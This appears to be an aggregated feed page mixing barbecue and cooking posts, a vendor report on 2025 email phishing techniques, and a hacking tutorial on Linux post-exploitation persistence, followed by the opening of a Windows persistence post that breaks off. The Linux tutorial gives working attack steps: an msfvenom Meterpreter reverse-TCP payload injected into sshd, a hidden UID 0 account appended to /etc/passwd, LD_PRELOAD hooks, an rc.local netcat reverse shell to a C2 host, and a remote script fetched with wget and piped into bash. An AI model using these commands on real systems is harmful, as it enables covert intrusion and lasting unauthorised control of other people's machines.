Normal view

There are new articles available, click to refresh the page.
Before yesterdayMain stream

How to Grill Rib Wings Like a Pitmaster

Updated November 2025

Barbecue fans love a great mash-up — and rib wings are exactly that. Part baby back rib, part chicken wing in spirit, these trimmed rib bites deliver crispy bark and tender, smoky meat in a single bite. Perfect for tailgates or backyard feasts, they’re easy to cook hot and fast over live fire, with that irresistible “rib-by” chew that keeps everyone reaching for more.

Ribs Take Wing

First came Beer Can Chicken. Then the Bacon Explosion. Then Bacon Wrapped Onion Rings and Pork Shooters.

So the next way cool thing that will rock the barbecue blogosphere?

We’re putting our Bitcoins on Rib Wings.

Rib Wings are made by slicing a rack of ribs into individual ribs before cooking. The process resembles how chicken wings are divided into drumettes and flats.

Which brings us to the debate as to who in the barbecue world first created the rib wing. Forbes.com writer and Barbecue University alum Larry Olmsted credits Mike Hiller with the Rib Wing (Forbes, May 2021).

I’m a diehard mad scientist when it comes to barbecue. I love experimenting when I cook. I like to see how changing the rub, the sauce, or the grill produces new flavors and textures. For example, the ribs I cook low and slow in a Big Green Egg XL will taste and look different than the ribs I hang in my Pit Barrel Cooker. Check out my “Ultimate Rib” blog to read more about my ribs experiments.

Rib Wings are my latest experiment. A rack of ribs is typically sliced into individual ribs after cooking; why not cook them that way? And why did no one think of it earlier?

How to Grill Rib Wings

Here is how my Rib Wings came together. I started by slicing a rack of St Louis cut spareribs into individual ribs. I normally remove the membrane from a rack of ribs before cooking. Slicing the ribs before cooking eliminates that tedious step per Hiller. I liberally seasoned the ribs with one of my homemade spice rubs. (You could also use Steven’s Kansas City Smoke Rub.

I then placed the ribs on a wire rack to make it easier to move them on and off the grill. I left space between each rib so the smoke would circulate evenly. My plan was to cook the ribs low and slow, spray the ribs with an apple cider vinegar mixture while cooking, and then baste with barbecue sauce at the end as outlined by Hiller.

I set up a Big Green Egg XL for indirect grilling by inserting the diffuser plate and obtained a temperature of 250 degrees. I used apple chucks to create wood smoke. After smoking the ribs for one hour, I started spraying the ribs with a mixture of apple cider vinegar, Worcestershire, and hot sauce.

Rib Wings 1 hr in

I continued to spray the ribs every 30 minutes. To finish the ribs, I increased the temperature to 375 degrees for the last 20 minutes and basted the ribs with my homemade spicy peach barbecue sauce. Total cooking time was three and half hours. I knew the ribs were done when the meat was pulled back from the bones.

Here is what I learned by cooking ribs individually. The smaller ribs cooked faster than the meatier middle ribs. The ribs from the ends of the rack were fall of the bone tender, but I prefer my ribs to hold together when I take a bite. The meatier ribs held together beautifully. The ribs developed a dark mahogany color, almost to the point of looking burnt. I feel the dark color was a result of the Worcestershire sauce in the spray mixture. The dark color occurred before I added the spicy peach barbecue sauce, so it was not due to burning the sauce.

Rib Wings on butcher paper

The process of seasoning and smoking the ribs individually definitely boosts the flavor compared to the whole rack method. Every bite had a heightened level of sweetness, spiciness, and smokiness. The combination of the rub and smoke created a crisp texture that reminded me of the “bark” I love on brisket. One minor shortcoming of smoking individual ribs is the smaller end ribs were a hint less tender on the inside. The most noticeable advantage to the “Rib Wing” is that each bite of the rib has a blast of flavor that comes from exposing all sides of the rib to spice rub and smoke.

I think Rib Wings would make a great appetizer for a cookout. I wondered if I could cook enough to make a meal, so I ran a second test. The second test was going to be performed on my Pit Barrel Cooker, which is one of my favorite methods to cook multiple racks of ribs or wings for a large group. I can hang 6-8 racks of ribs or cook over seventy chicken wings on the hanging skewers in the barrel cooker. I sliced the ribs and seasoned them with Steven’s Kansas City rub. Apple wood chips were added to create wood smoke. The barrel cooks at a higher temperature so I anticipated a different texture and shorter cooking time.

I wanted to skewer the ribs and hang them like I do chicken wings. After a few attempts, I didn’t feel the ribs were secure on the hanging skewers and might fall off as the meat pulls back from the bones. Disappointed, I placed the individual ribs on the grate.

I started to spray the ribs with the same apple cider vinegar mixture after 30 minutes. The ribs started to pull back from the bones after an hour and a quarter. I then basted the ribs with Steven’s Chipotle Molasses barbecue sauce and cooked for an additional 15 minutes. Total cooking time was an hour and a half.

Rib Wings with sauce

Due to the higher temperature of the barrel cooker the rub and sauce caramelized and produced a sweet and smoky exterior. The aroma of wood smoke was present despite the shorter time exposed to the smoke. The time required to cook the larger ribs caused the smaller end ribs to become too crispy. The ribs developed the same dark color on the ribs as in the first test. The ribs had an appealing sweet with a little heat flavor due to the combination of Steven’s rub and sauce. The ribs held together with each bite. The only drawback? I was disappointed I could not hang the ribs. I thought it would be a cool way to cook enough rib wings for a larger group.

I enjoyed both experiments because they were so incredibly tasty. Seasoning all sides of the ribs and adding sauce elevated the flavor of the ribs. I hope this inspires you to run your own flavorful experiment.

So blogsphere—get ready for rib wings. You’ll never think about ribs—or wings—the same way!

Rib wings are one of those sleeper hits that turn a regular cookout into something memorable. Once you’ve tried them, you’ll wonder why more people don’t grill ribs this way. For more creative rib ideas and live-fire inspiration, check out Project Smoke, Project Fire, or browse the Ribs section on BarbecueBible.com.


Steve Nestor is the fire wrangler on Project Fire and at Barbecue University. More importantly, he’s an incredibly skilled physical therapist in the Boston area. If leaning over a hot grill or pulling heavy briskets from smoker leaves you with weak knees or a sore back, give him a call. At very least, sign up for his newsletter.

https://nestorphysicaltherapy.com/

Grilled Rib Wings: Frequently Asked Questions

What exactly are rib wings?
Rib wings are sections cut from the baby back rib rack near the loin. They’re smaller than full ribs, with just enough meat and fat to cook quickly and still stay juicy.
How do you grill rib wings?
Season with your favorite rub, then grill over medium-high heat (375–400°F) for about 20–25 minutes, turning often until the meat is browned and tender. Brush with sauce at the end if desired.
Should I use direct or indirect heat?
Start over direct heat to crisp the exterior, then finish over indirect heat until the internal temperature reaches about 190°F. This gives you a tender bite without burning the rub.
What rubs or sauces pair best?
Try Steven Raichlen’s Basic Barbecue Rub or Project Smoke All-Purpose Rub for seasoning. Finish with your favorite barbecue sauce or glaze for a sweet-smoky finish.
Can rib wings be smoked instead of grilled?
Absolutely. Smoke them at 250–275°F for 1.5 to 2 hours with fruitwood or hickory until tender and lightly charred. They’ll take on a deeper, more traditional barbecue flavor.

Related Posts

Check out our 1000+ Recipes section here on Barbecue Bible.Com

Also, sign up for our Up in Smoke newsletter so you don't miss any blogs and receive some special offers! PLUS get Raichlen's Burgers! PDF for free!

Follow Steven on Facebook, Instagram, YouTube, TikTok, Reddit, and Pinterest!

Check out our store powered by BBQGuys!

The post How to Grill Rib Wings Like a Pitmaster appeared first on Barbecuebible.com.

How to Make Sauerkraut at Home – It’s Easier Than You Think

7 November 2025 at 06:00

The running joke in my family – which I unabashedly perpetuate – is that I’m of German descent – though, admittedly, my blood runs Irish green. Despite that, I do love German cuisine, especially, this time of year when there’s a cool nip in the air and an increasing amount of Octoberfest beer on the shelves of my local package goods store.

Knowing my penchant for all-things-Teutonic (and relating to the aforementioned running joke), my sister recently bought me a Sauerkraut-making-kit thinking that; a) it’ll be fun; b) the end result will be better than store-bought and; c) it’s so easy that even I could do it!

Having no alternative, I accepted the challenge – and in sharing my experience here, perhaps you will too.

Tools You’ll Need

To begin, here’s what you’ll need:

Homemade Sauerkraut Recipe Equipment

Homemade Sauerkraut Recipe

For the Sauerkraut, you’ll need:

  • 1 head of Cabbage (more if you’d like to make a bigger batch)
  • Kosher salt (2% of the shredded cabbage’s weight)

And the basic procedure is as follows:

  1. Shred or slice the cabbage (thickness is your preference)
  2. Mix the sliced cabbage in a bowl with salt (2% of weight of cabbage) until slightly watery

    Example: My cabbage weighed 640 grams, so I used approx. 13 grams of salt

    Note: Crush, squeeze and mix the cabbage with the salt until slightly watery (2- to 5-minutes)

    Cabbage in a bowl

  3. Place in Ball Jar (a little bit at a time) and use Muddler to compress until juice is above cabbage
    Compress into a jar
  4. Cover cabbage/salt mixture with the fermentation weight(s), or weigh down with pinch bowl
  5. Cover the jar with the fermentation lid and let set un-refrigerated
  6. Fermentation takes about 2-weeks – but feel free to taste every few days until the sauerkraut is to your liking.

Fermentation

Like I said, so easy a caveman can do it!

Have fun – and look for my next post in a few weeks to see how my Sauerkraut turned out.

Related Posts

Sauerkraut: Frequently Asked Questions

What ingredients do I need for homemade sauerkraut?
Just cabbage and kosher salt. Use about 2% salt by the cabbage’s weight (e.g., 640 g cabbage → ~13 g salt). :contentReference[oaicite:0]{index=0}
What basic tools do I need?
A mixing bowl, scale, jar (e.g., Ball jar), fermentation lid, weights (or a small pinch bowl), and a muddler. A mandoline or sharp knife works for slicing. :contentReference[oaicite:1]{index=1}
How do I prep the cabbage?
Shred or slice to your preferred thickness, then massage with the 2% salt until it turns slightly watery (about 2–5 minutes). :contentReference[oaicite:2]{index=2}
How do I pack the jar and keep the cabbage submerged?
Pack cabbage into the jar a little at a time and tamp with a muddler until the brine rises above the cabbage. Add weights (or a pinch bowl) to keep it submerged, then fit the fermentation lid. :contentReference[oaicite:3]{index=3}
How long should I ferment it—and when is it ready?
About two weeks at room temp is typical, but start tasting every few days and stop when the flavor is where you like it. :contentReference[oaicite:4]{index=4}
Check out our 1000+ Recipes section here on Barbecue Bible.Com

Also, sign up for our Up in Smoke newsletter so you don't miss any blogs and receive some special offers! PLUS get Raichlen's Burgers! PDF for free!

Follow Steven on Facebook, Instagram, YouTube, TikTok, Reddit, and Pinterest!

Check out our store powered by BBQGuys!

The post How to Make Sauerkraut at Home – It’s Easier Than You Think appeared first on Barbecuebible.com.

A Revolutionary New Way to Cook Bratwurst

Refreshed for 2025

Succulence and smoke guaranteed.

He wouldn’t. He shouldn’t. He did.

He being me, and I found a revolutionary new way to grill bratwurst. It’s about to make you and your next tailgate party succeed like a million bucks!

From the beginning of time (or a least bratwurst), people have grilled this traditional German sausage directly over the fire.

Even the name suggest direct grilling: braten is the German word for to roast or grill.

Bratwurst "Hot Tub"

Direct grilling bratwurst and other fresh sausage has benefits and risks. Get it right, and you wind up with a crisp smoky casing and sizzling meat. Get it wrong and the bratwurst will split and the fat will gush onto the fire, turning your grill into a conflagration. Or one side will come out charred; the other side raw, which is an equally unhappy result.

But what if there was a way to grill brats without these fiery risks? There is and I discovered it a few years ago when I suddenly had to cook 60 brats for a book signing and my assistant was a no show.

Indirect grilling bratwurst

So I set up my grill for indirect grilling and lined up the brats on the grate. Then, in a moment of inspiration, I added hickory wood to the coals. The result was astonishing. Indirect grilling kept the casings and juices intact, which meant brats that were 30 percent juicier than the sausage I grilled using the direct method.

And the smoke flavor made the brats off the charts delicious. (Think bratwurst channeling barbecue.)

Indirect grilling bratwurst

Best of all, the method works for all manner of fresh wurst, from chorizo to Italian sausage.

Brats are indispensable for any self-respecting tailgate party. Use my indirect grilling with wood smoke method for the best brats you’ve ever tasted.

How to do it

  1. Set up for indirect. Two-zone fire (coals/burners on one side only). Aim for 350–375°F in the indirect zone.
  2. Add wood. Place a fist-size chunk of hickory (or a handful of chips) over the hot side.
  3. Cook gently. Arrange brats on the cool side, lid down, vents open. Cook to 155–160°F internal, 20–30 minutes, rotating once.
  4. Optional crisp. Roll brats over the hot side for 30–60 seconds to blister the casing.

Time & temp cheatsheet

  • Grill temp (indirect zone): 350–375°F
  • Wood: Hickory (oak or apple also fine)
  • Target internal temp: 160°F (USDA for fresh pork)
  • Typical time: 20–30 min indirect + 1 min crisp

Bratwurst Recipes

Bratwurst: Frequently Asked Questions

Why not grill brats directly over the fire?
Direct heat can split casings and dump fat onto the coals, causing flare-ups and uneven cooking. Indirect heat keeps juices in and cooks evenly.
What grill setup works best for this method?
Use a two-zone fire: coals or burners on one side, brats on the other. Maintain 350–375°F in the indirect zone with the lid closed.
Do I need wood for smoke?
A chunk of hickory (or oak/apple) over the hot side adds barbecue-level flavor without raising the indirect temperature. Highly recommended.
When are the brats done?
Pull at 155–160°F internal. If you want extra snap, sear 30–60 seconds over the hot side to blister the casing.
Does this work for other sausages?
Yes. Italian sausage, chorizo, kielbasa, and other fresh sausages benefit from the same indirect + smoke approach.
Check out our 1000+ Recipes section here on Barbecue Bible.Com

Also, sign up for our Up in Smoke newsletter so you don't miss any blogs and receive some special offers! PLUS get Raichlen's Burgers! PDF for free!

Follow Steven on Facebook, Instagram, YouTube, TikTok, Reddit, and Pinterest!

Check out our store powered by BBQGuys!

The post A Revolutionary New Way to Cook Bratwurst appeared first on Barbecuebible.com.

The evolving landscape of email phishing attacks: how threat actors are reusing and refining established techniques

21 October 2025 at 06:00

Introduction

Cyberthreats are constantly evolving, and email phishing is no exception. Threat actors keep coming up with new methods to bypass security filters and circumvent user vigilance. At the same time, established – and even long-forgotten – tactics have not gone anywhere; in fact, some are getting a second life. This post details some of the unusual techniques malicious actors are employing in 2025.

Using PDF files: from QR codes to passwords

Emails with PDF attachments are becoming increasingly common in both mass and targeted phishing campaigns. Whereas in the past, most PDF files contained phishing links, the main trend in these attacks today is the use of QR codes.

Email with a PDF attachment that contains a phishing QR code

Email with a PDF attachment that contains a phishing QR code

This represents a logical progression from the trend of using QR codes directly in the email body. This approach simplifies the process of disguising the phishing link while motivating users to open the link on their mobile phone, which may lack the security safeguards of a work computer.

Email campaigns that include phishing links embedded in PDF attachments continue to pose a significant threat, but attackers are increasingly employing additional techniques to evade detection. For example, some PDF files are encrypted and protected with a password.

Phishing email with a password-protected PDF attachment

Phishing email with a password-protected PDF attachment

The password may be included in the email that contains the PDF, or it may be sent in a separate message. From the cybersecurity standpoint, this approach complicates quick file scanning, while for the recipients it lends an air of legitimacy to attackers’ efforts and can be perceived as adherence to high security standards. Consequently, these emails tend to inspire more user trust.

PDF file after the user enters the password

PDF file after the user enters the password

Phishing and calendar alerts

The use of calendar events as a spam technique, which was popular in the late 2010s but gradually faded away after 2019, is a relatively old tactic. The concept is straightforward: attackers send an email that contains a calendar appointment. The body of the email may be empty, but a phishing link is concealed in the event description.

Blank email with a phishing link in the calendar appointment

Blank email with a phishing link in the calendar appointment

When the recipient opens the email, the event is added to their calendar – along with the link. If the user accepts the meeting without thoroughly reviewing it, they will later receive a reminder about it from the calendar application. As a result, they risk landing on the phishing website, even if they chose not to open the link directly in the original message.

In 2025, phishers revived this old tactic. However, unlike the late 2010s, when these campaigns were primarily mass mailshots designed with Google Calendar in mind, they are now being used in B2B phishing and specifically target office workers.

Phishing sign-in form for a Microsoft account from a calendar phishing attack

Phishing sign-in form for a Microsoft account from a calendar phishing attack

Verifying existing accounts

Attackers are not just updating the methods they use to deliver phishing content, but also the phishing websites. Often, even the most primitive-looking email campaigns distribute links to pages that utilize new techniques.

Voice message phishing

Voice message phishing

For example, we observed a minimalistic email campaign crafted to look like an alert about a voice message left for the user. The body of the email contained only a couple of sentences, often with a space in the word “voice”, and a link. The link led to a simple landing page that invited the recipient to listen to the message.

Landing page that opens when clicking the link in the phishing email

Landing page that opens when clicking the link in the phishing email

However, if the user clicks the button, the path does not lead to a single page but rather a chain of verification pages that employ CAPTCHA. The purpose is likely to evade detection by security bots.

The CAPTCHA verification chain

The CAPTCHA verification chain

After repeatedly proving they are not a bot, the user finally lands on a website designed to mimic a Google sign-in form.

The phishing sign-in form

The phishing sign-in form

This page is notable for validating the Gmail address the user enters and displaying an error if it is not a registered email.

Error message

Error message

If the victim enters a valid address, then, regardless whether the password is correct or not, the phishing site will display another similar page, with a message indicating that the password is invalid. In both scenarios, clicking “Reset Session” opens the email input form again. If a distracted user attempts to log in by trying different accounts and passwords, all of these end up in the hands of the attackers.

MFA evasion

Because many users protect their accounts with multi-factor authentication, scammers try to come up with ways to steal not just passwords but also one-time codes and other verification data. Email phishing campaigns that redirect users to sites designed to bypass MFA can vary significantly in sophistication. Some campaigns employ primitive tactics, while others use well-crafted messages that are initially difficult to distinguish from legitimate ones. Let’s look at an email that falls in the latter category.

Phishing email that mimics a pCloud notification

Phishing email that mimics a pCloud notification

Unlike most phishing emails that try to immediately scare the user or otherwise grab their attention, the subject here is quite neutral: a support ticket update from the secure cloud storage provider pCloud that asks the user to evaluate the quality of the service. No threats or urgent calls to action. If the user attempts to follow the link, they are taken to a phishing sign-in form visually identical to the original, but with one key difference: instead of pcloud.com, the attackers use a different top-level domain, p-cloud.online.

The phishing sign-in form

The phishing sign-in form

At every step of the user’s interaction with the form on the malicious site, the site communicates with the real pCloud service via an API. Therefore, if a user enters an address that is not registered with the service, they will see an error, as if they were signing in to pcloud.com. If a real address is entered, a one-time password (OTP) input form opens, which pCloud also requests when a user tries to sign in.

OTP input form

OTP input form

Since the phishing site relays all entered data to the real service, an attempt to trick the verification process will fail: if a random combination is entered, the site will respond with an error.

Attempting to bypass verification

Attempting to bypass verification

The real OTP is sent by the pCloud service to the email address the user provided on the phishing site.

OTP email

OTP email

Once the user has “verified” the account, they land on the password input form; this is also requested by the real service. After this step, the phishing page opens a copy of the pCloud website, and the attacker gains access to the victim’s account. We have to give credit to the scammers: this is a high-quality copy. It even includes a default folder with a default image identical to the original, which may delay the user’s realization that they have been tricked.

Password input form

Password input form

Conclusion

Threat actors are increasingly employing diverse evasion techniques in their phishing campaigns and websites. In email, these techniques include PDF documents containing QR codes, which are not as easily detected as standard hyperlinks. Another measure is password protection of attachments. In some instances, the password arrives in a separate email, adding another layer of difficulty to automated analysis. Attackers are protecting their web pages with CAPTCHAs, and they may even use more than one verification page. Concurrently, the credential-harvesting schemes themselves are becoming more sophisticated and convincing.

To avoid falling victim to phishers, users must stay sharp:

  • Treat unusual attachments, such as password-protected PDFs or documents using a QR code instead of a link to a corporate website, with suspicion.
  • Before entering credentials on any web page, verify that the URL matches the address of the legitimate online service.

Organizations are advised to conduct regular security training for employees to keep them up-to-date on the latest techniques being used by threat actors. We also recommend implementing a reliable solution for email server security. For example, Kaspersky Security for Mail Server detects and blocks all the attack methods described in this article.

Advanced Linux Persistence: Strategies for Remaining Inside a Linux Target

3 October 2025 at 12:40

Welcome back, aspiring hackers!

In part one of our Linux persistence series, we covered the basics – the quick wins that keep you connected after a compromise. Now it’s time to take things up a notch. In this part, we’re going to dive into techniques that give you more flexibility, more stealth, and in some cases, more durability than the simple shell loops, autostarts, and cron jobs we looked at before.

We’ll start with in-memory payloads, where nothing ever touches disk, making them almost invisible while they’re running. Then we’ll look at persistence through operating system configuration changes. No malware needed, just some creative abuse of the system’s own settings. From there, we’ll move into LD_PRELOAD, a legitimate Linux feature that can quietly hook into processes and run our code without launching any suspicious binaries. We’ll also talk about rc.local for those times you want a simple, one-shot startup hook, and we’ll finish with gsocket, a powerful tunneling tool that can keep a connection alive even when the network is working against you.

By the end of this part, you’ll have a toolkit that covers both stealthy short-term access and long-term, hard-to-shake persistence. And if you combine what we’ve done here with the foundations from part one, you’ll have the range to adapt to just about any post-exploitation environment.

In-Memory

An in-memory backdoor is a persistence-adjacent technique aimed at maintaining control without leaving forensic traces on disk. Instead of writing a payload to the filesystem, you inject it directly into the memory space of a running process. This approach is attractive when stealth is a higher priority than durability, as most antivirus solutions perform limited real-time inspection of memory. Even technically adept users are unlikely to notice a malicious implant if it resides inside a legitimate, already-running process.

In this example, the chosen payload is Meterpreter, a well-known tool capable of operating entirely in memory. A typical workflow might look like this:

c2 > msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=C2_IP LPORT=9005 exitfunc=thread StagerRetryCount=999999 -f raw -o meter64.bin

creating an in-memory payload with msfvenom

Here, msfvenom generates a raw Meterpreter reverse TCP payload configured to connect back to our C2 at the specified host and port. 

exitfunc=thread controls how the payload cleans up when it finishes or encounters an error. Thread means it will terminate only the thread it is running in, leaving the rest of the host process alive. This is critical for in-memory injection into legitimate processes because it avoids crashing them and raising suspicion.

StagerRetryCount=999999 instructs the stager to retry the connection up to 999,999 times if it fails. Without this, a dropped connection might require re-injecting the payload. With it, the backdoor keeps trying indefinitely until we are ready to receive the connection.

With pgrep you list processes to inject your payload into

target#> pgrep -x sshd

finding a process with pgrep to inject the in-memory payload into with

target#> mv /root/meter64.bin /root/mmap64.bin

target#> inject_linux 1032 mmap64.bin

injecting the in-memory payload with inject_linux into a process

The inject_linux utility then injects the binary blob into the process identified by PID, causing that process to execute the payload entirely in memory. No new file is created on disk, and no service or scheduled task is registered. Note, you might need to rename your payload as mmap64.bin.

receiving a reverse connection

Pros: Works under any user account, extremely difficult for a human observer to detect, and avoids leaving traditional artifacts like startup entries or executable files on disk.

Cons: Does not survive a reboot. The moment the system restarts or the host process ends, the implant disappears.

While this method lacks persistence in the strict sense, it provides a highly covert foothold for as long as the target system remains powered on. In a layered intrusion strategy, in-memory implants can complement more traditional persistence mechanisms by offering an immediately available, stealthy access channel alongside longer-lived backdoors.

Configs

Persistence through configuration changes takes a different path from typical backdoors or reverse shells. Instead of running malicious code, it manipulates the operating system’s own settings to ensure we can regain access later. Because there is no executable payload, such changes are far less likely to trigger antivirus detection. However, this method is viable only when you have direct access to the target system and sufficient privileges to modify core configuration files.

One of the most common examples is creating a hidden user account that can be used for future remote logins. In the example:

target# > openssl passwd -1 -salt test P@ssw0rd123

target# > echo 'post:$1$test$dIndzcyu0SmwXz37byHei0:0:0::/:/bin/sh' >> /etc/passwd

creating a hidden user with a root shell

The first command uses openssl passwd with the -1 flag to generate an MD5-based hashed password (-salt test specifies a custom salt, here “test”) for the chosen password P@ssw0rd123. The output is a string in the format expected by /etc/passwd.

The second command appends a new entry to /etc/passwd for a user named post, with the generated password hash, UID 0, and GID 0 (making it equivalent to the root user), no home directory, and /bin/sh as its shell. This effectively creates a hidden superuser account.

Finally, make sure you have modified the /etc/ssh/sshd_config file to ensure that root (and by extension, the post account with UID 0) can log in over SSH (PermitRootLogin yes). This ensures you can reconnect remotely, provided the target system is reachable over the network.

editing the sshd_config to allow root login

After that restart the SSH service

target# > service sshd restart

connecting via ssh

Pros:  Survives reboots, and does not require running any malicious executable.

Cons: Requires administrative or root privileges to modify system files, and is ineffective if the machine is behind NAT or a restrictive firewall that blocks inbound connections.

This method is a pure OS-level manipulation. It leaves no malicious process in memory, but its success depends entirely on your ability to later connect directly to the host. In targeted intrusions, it is often combined with other persistence methods to ensure redundancy.

LD_PRELOAD

Using LD_PRELOAD for persistence takes advantage of a legitimate dynamic linking feature in Linux to inject custom code into every newly launched process. The LD_PRELOAD environment variable tells the dynamic linker to load a specified shared library before any others, allowing our code to override or hook standard library functions in user-space applications. This approach can be used to execute arbitrary logic, including establishing a shell or logging credentials.


First we create a meter.c file which will later be compiled into meter.so

target# > nano meter.c

creating a meter.c file for LD_PRELOAD persistence

Then the payload is compiled with the following command:

c2 > gcc -fPIC -shared -o meter.so meter.c

comping the meter.c file

Next you write the path to your shared object (meter.so) into /etc/ld.so.preload. This file is consulted by the dynamic linker globally, meaning every dynamically linked binary will load the specified library, regardless of which user runs it. This requires root privileges.

target#> echo /path/to/meter.so >> /etc/ld.so.preload

Then you add an export LD_PRELOAD=/path/to/meter.so line to /etc/profile, ensuring that all users who log in through an interactive shell will have the environment variable set automatically

target#> echo export LD_PRELOAD=/path/to/meter.so >> /etc/profile

This command does the same but only for a single user by appending the export command to that user’s ~/.bashrc

target$> echo export LD_PRELOAD=/path/to/meter.so >> ~/.bashrc

Pros: Survives reboots, works under any user account, and can be applied system-wide or per-user. It allows the injected code to run within the context of legitimate processes, making detection harder.

Cons: The execution interval is uncontrolled, as code runs only when a new process starts, so reconnection timing is less predictable than with scheduled tasks or services.

rc.local

Persistence via rc.local relies on a legacy startup mechanism in Linux systems. The /etc/rc.local script, if present and executable, is run automatically by the init system once at the end of the multi-user boot sequence. By inserting a command into this file, we can ensure our payload executes automatically the next time the system restarts.

target#> echo "nc C2_IP 8888 -e /bin/bash &" >> /etc/rc.local

creating rc.local persistence

This appends a netcat command to /etc/rc.local that, when executed, connects back to our host on port 8888 and spawns /bin/bash, providing an interactive reverse shell. The ampersand (&) runs it in the background so it does not block the rest of the boot process.

Because rc.local executes only once during startup, the payload will not continuously attempt reconnection. It will run a single time after each reboot. If the connection fails at that moment, for instance, if your listener is not ready or the network link is down, no further attempts will be made until the next reboot.

Pros: Survives reboots and is simple to implement.

Cons: Requires root privileges to modify /etc/rc.local, and the execution interval is uncontrolled, it runs only once per boot, offering no retry mechanism between reboots.

While this method is straightforward and low-profile, it is limited in reliability. In modern Linux distributions, rc.local is often disabled by default or replaced by systemd service files, making it more of a legacy technique. For attackers seeking long-term, automated persistence, it’s usually combined with other methods that retry connections or run continuously.

Gsocket

Gsocket is a cloud relay both sides connect to, linking their outbound connections into a single encrypted two-way tunnel. From our perspective as attackers, that’s gold: we don’t need an open inbound port on the victim, we don’t have to wrestle with NATs or port-forwards, and a single cloud broker becomes a C2 for many targets. Long-lived outbound TLS-like streams blend into normal egress traffic, so the connection looks far less suspicious than an exposed listener.

We like Gsocket, because it massively reduces operational overhead. There is less infrastructure to maintain and much better success rates in restrictive networks because everything is outbound.

Here is how you install it on the target:

target# > bash -c "$(wget --no-verbose -O- https://gsocket.io/y)"

target$ > bash -c "$(wget --no-verbose -O- https://gsocket.io/y)"

installing gs-netcat on the target

Next, install it on your C2 and access it with the secret key

c2 > sudo apt install gsocket

c2 > gs-netcat -s “secret key” -i

installing gs-netcat and connecting to the target

More information can be found here:

https://www.gsocket.io/deploy

Pros: A stealthy way to establish remote access, pivot, exfiltrate data, or maintain a backdoor, especially in complex network environments.

Cons: Leaves traces, like persistent scripts or network access patterns and reliance on a shared secret requires careful secret management.

Summary

In part two, we stepped away from the basics and explored persistence and access techniques that push deeper into stealth and adaptability. We started with in-memory backdoors, great for situations where avoiding detection matters more than surviving a reboot. We then moved on to persistence through config changes, such as creating hidden users in /etc/passwd, which survive reboots without needing any malicious process running. After that, we covered LD_PRELOAD, a dynamic linker trick that quietly injects code into normal processes. We looked at rc.local for quick, legacy-style startup hooks, and wrapped up with gsocket, a tunneling tool that can keep a lifeline open even through restrictive firewalls or NAT.

Together, these two parts give you a layered approach: fast, simple persistence to hold your ground, plus stealthy, advanced techniques to stay in control for the long haul.

The post Advanced Linux Persistence: Strategies for Remaining Inside a Linux Target first appeared on Hackers Arise.

Wildfire Presents The Five Best Techniques For Cooking on a Griddle

24 September 2025 at 10:20

Most griddling is done in a pretty straightforward manner. You heat the griddle and oil it well. Add the food. Cook until sizzling and browned on the bottom, then cook the other side the same way until done in the center. It’s as simple as that. The short list of foods that can be griddled in this way includes eggs, pancakes, French toast, thin steaks and chops, burgers, chicken breasts, fish fillets, shrimp and crabcakes, thinly sliced vegetables and fruits, noodles, rice, and more – which isn’t such a short list after all. Now, here’s how to griddle them.

Griddle Technique #1: Divide-And-Conquer Griddling

Best for thick sandwiches, like medianoches and muffulettas. Build the sandwich in two halves, with the cold cuts on top. Layer a sheet of parchment paper atop the cold cuts, and start griddling the meat with the parchment paper side down. When the meats are hot and sizzling, carefully turn the half sandwich so the bread side is down. Peel off and discard the parchment paper. Put the two halves together and your sandwich is ready.

Divide and Conquer Griddling

Technique #2: Dome Griddling

This method is used for cooking larger or slower-cooking foods, like thicker steaks and chops, chicken pieces, fish steaks—any food that requires a little more heat and time to cook. Place a griddle dome or metal bowl over the food while it’s on the griddle to hold in the heat. Use dome griddling for melting the cheese in a grilled cheese sandwich and speeding up the cooking of a sunny-side up egg.

Griddle Dome

Technique #3: Steam Griddling

This is a technique developed in Asia to facilitate griddling dense vegetables, like broccoli and winter squash. Work over a medium-hot to hot griddle. Start by cooking the vegetables in oil. Then squirt a tablespoon or two of water on the vegetables. It will boil rapidly, steaming the vegetables in the process. Add more water as needed until the vegetables are sizzling and lightly browned. To intensify the effect, place a griddle dome over the food.

Steam Griddling

Technique #4: Salt Griddling

A unique method for griddling that Spanish chef José Andrés uses to cook carabineros—Spain’s supernaturally succulent scarlet shrimp. (They take their name from the scarlet uniforms once worn by Spanish carabineros, or police.) Spread out coarse sea salt in a .4-inch-thick (1 cm) layer over your plancha. Heat it well, then lay the shrimp on top. Note: The Spanish like their shrimp barely cooked (make that half-raw) in the center.

Technique #5: Smoke-Griddling

In this method, you smoke right on the surface of the griddle. Heat one zone to high and one zone to medium. Mound a handful of hardwood chips or pellets or a couple of tablespoons of hardwood sawdust directly on the griddle over the hot zone. When it starts to smoke, slide the wood to the medium zone and place the food to be griddled next to it (oil it first). Cover with the griddle dome. Griddle the food covered—the smoldering wood will provide a delicate smoke flavor.

Smoke Griddling

Naturally, all of these recipes will be most successful if griddled on a high-quality grill – like the Wildfire Ranch Pro 30-Inch Stainless Steel Griddle* – with features that make it a superior choice over cast-iron products, including corrosion resistance and durability, 8mm surface (for heat retention and even cooking), and low maintenance (easy to clean, no seasoning required).

Wildfire 30 GRIDDLE BLACK CART ANGLE OPEN

* Enter here for your chance to win this Griddle and Steven’s newest book, Project Griddle.

Wildfire Contest

Check out our 1000+ Recipes section here on Barbecue Bible.Com

Also, sign up for our Up in Smoke newsletter so you don't miss any blogs and receive some special offers! PLUS get Raichlen's Burgers! PDF for free!

Follow Steven on Facebook, Instagram, YouTube, TikTok, Reddit, and Pinterest!

Check out our store powered by BBQGuys!

The post Wildfire Presents The Five Best Techniques For Cooking on a Griddle appeared first on Barbecuebible.com.

Post Exploitation: Maintaining Persistence in Windows

28 August 2025 at 09:54

Hello cyberwarriors!

This module takes the often-confusing topic of Windows persistence and turns it into a pragmatic playbook you can use during real engagements. In this part we start small and build up: short-lived shell loops that are easy to launch from any user context, autostart locations and registry Run keys that provide reliable logon-time execution, scheduled tasks that offer precise timing and powerful run-as options, Windows services that deliver the most durable, pre-logon persistence, and in-memory techniques that minimize on-disk traces. 

Techniques are shown with privileged # and non-privileged $ examples, so you can see what’s possible from the access you already have. Every method shows the balance between how secret it is, whether it stays after a restart, and what permissions you need to make it work.

Ultimately this module is designed to be immediately useful in the ongoing cyber conflict context. It is compact with repeatable techniques for maintaining access when appropriate.

Shell

Persistence can be achieved directly from a command prompt by creating a small looping construct that repeatedly launches a reverse or bind shell and then pauses for a fixed interval. The technique relies on a persistent cmd.exe process that keeps retrying the connection instead of using service registration or scheduled tasks. It’s a quick, user-space way to try to maintain an interactive foothold while the process lives. The example command is:

